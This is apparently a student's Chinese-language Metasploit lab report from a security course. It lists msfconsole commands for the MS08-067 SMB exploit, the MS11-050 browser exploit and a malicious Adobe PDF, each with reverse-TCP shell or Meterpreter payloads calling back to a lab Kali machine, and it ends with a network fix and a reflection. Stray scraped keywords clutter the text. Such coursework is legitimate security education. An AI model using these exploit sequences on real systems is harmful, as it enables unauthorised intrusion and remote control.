本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:html
一個主動攻擊實踐,如ms08-067; (1分)linux
一個針對瀏覽器的攻擊,如ms11-050;(1分)shell
一個針對客戶端的攻擊,如Adobe;(1分)windows
成功應用任何一個輔助模塊。(0.5分)api
以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分。瀏覽器
exploit
,payload
,encode
?exploit
:Exploit 的英文意思就是利用,它在黑客眼裏就是漏洞利用。有漏洞不必定就有Exploit(利用)。有Exploit就確定有漏洞。payload
:病毒一般會作一些有害的或者惡性的動做。在病毒代碼中實現這個功能的部分叫作"有效負載"(payload)。payload能夠實現任何運行在受害者環境中的程序所能作的事情,而且可以執行動做包括破壞文件刪除文件,向病毒的做者或者任意的接收者發送敏感信息,以及提供通向被感染計算機的後門。encode
:編碼,編製成計算機語言攻擊機:Kali(IP地址:192.168.91.135)安全
靶機: windows XP SP3(English)(IP地址:192.168.91.134)網絡
在攻擊機kali輸入msfconsole
進入控制檯,依次輸入如下指令:tcp
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > show payloads
msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp
//tcp反向回連msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.91.135
//攻擊機ipmsf exploit(windows/smb/ms08_067_netapi) > set LPORT 5308
//攻擊端口msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.91.134
//靶機ip,特定漏洞端口已經固定msf exploit(windows/smb/ms08_067_netapi) > set target 0
//自動選擇目標系統類型,匹配度較高msf exploit(windows/smb/ms08_067_netapi) > exploit
//攻擊
攻擊機:kali (IP地址:192.168.91.135)學習
靶機:WindowsXP Professional sp2/Windows7專業版 (IP地址:192.168.91.136)
在攻擊機kali輸入msfconsole
進入控制檯,依次輸入如下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
info指令查看該模塊的信息
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_tcp
//http反向回連msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.91.135
//攻擊機ipmsf exploit(ms11_050_cobjectelement) > set LPORT 5308
//攻擊端口固定msf exploit(ms11_050_cobjectelement) > set URIPATH baidu
//統一資源標識符路徑設置set target 1
msf exploit(ms11_050_cobjectelement) > exploit
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用該模塊,再使用show payloads
payload
:攻擊機:kali
靶機:windowsXP Professional sp2
在攻擊機kali輸入msfconsole進入控制檯,依次輸入如下指令:
先用search adobe
得知此漏洞所在的模塊
show targets
查看能夠被攻擊的靶機的操做系統型號msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp
反向回連msf exploit(adobe_cooltype_sing) > set LHOST 192.168.91.135
//攻擊機ipmsf exploit(adobe_cooltype_sing) > set LPORT 5308
//攻擊端口msf exploit(adobe_cooltype_sing) > set FILENAME 5308hwf.pdf
//設置生成pdf文件的名字msf exploit(adobe_cooltype_sing) > exploit
//攻擊在kali上進入監聽模塊,輸入如下命令:
msf > use exploit/multi/handler
//進入監聽模塊msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
//tcp反向鏈接msf exploit(handler) > set LHOST 192.168.91.135
//攻擊機ipmsf exploit(handler) > set LPORT 5308
//攻擊端口固定msf exploit(handler) > exploit
針對這個問題,我以前的解決辦法其一是關閉虛擬機,從新開一遍,地址就會正常了。其二就是從新安一下虛擬機,因此個人硬盤中虛擬機老是得備份。可是老是出現這個問題也不是辦法,我相信有的同窗也遇到過這個問題(不會只有我這麼慘吧???)
解決:
通常是eth0被禁掉了,就只會顯示127.0.0.1這個迴環地址 你用
ifup eth0
ifconfig up eth0
上面兩個命令均可以,而後 /etc/init.d/network restart
你就能看到eth0了。
https://blog.csdn.net/qq_36769100/article/details/71473632
本次實驗經過經過MSF的攻擊模塊對計算機進行各類攻擊方法的實踐,比前幾回的攻擊更加的系統化,同時攻擊的方法更加深刻。經過最後一個板塊的研究,使我將學習理論知識轉化爲自我實踐過程。
在其中某些模塊的學習中,老是會有攻擊不成功的地方,每當不成功,我就很懊惱,爲啥老是很別人的不同。可是在課上聽到老師說,攻擊不成功是很正常的事情,我忽然感受到了信心。而後經過查找學長學姐或是網上的解決方法,不斷解決問題,最後成功,感受頗有成就感。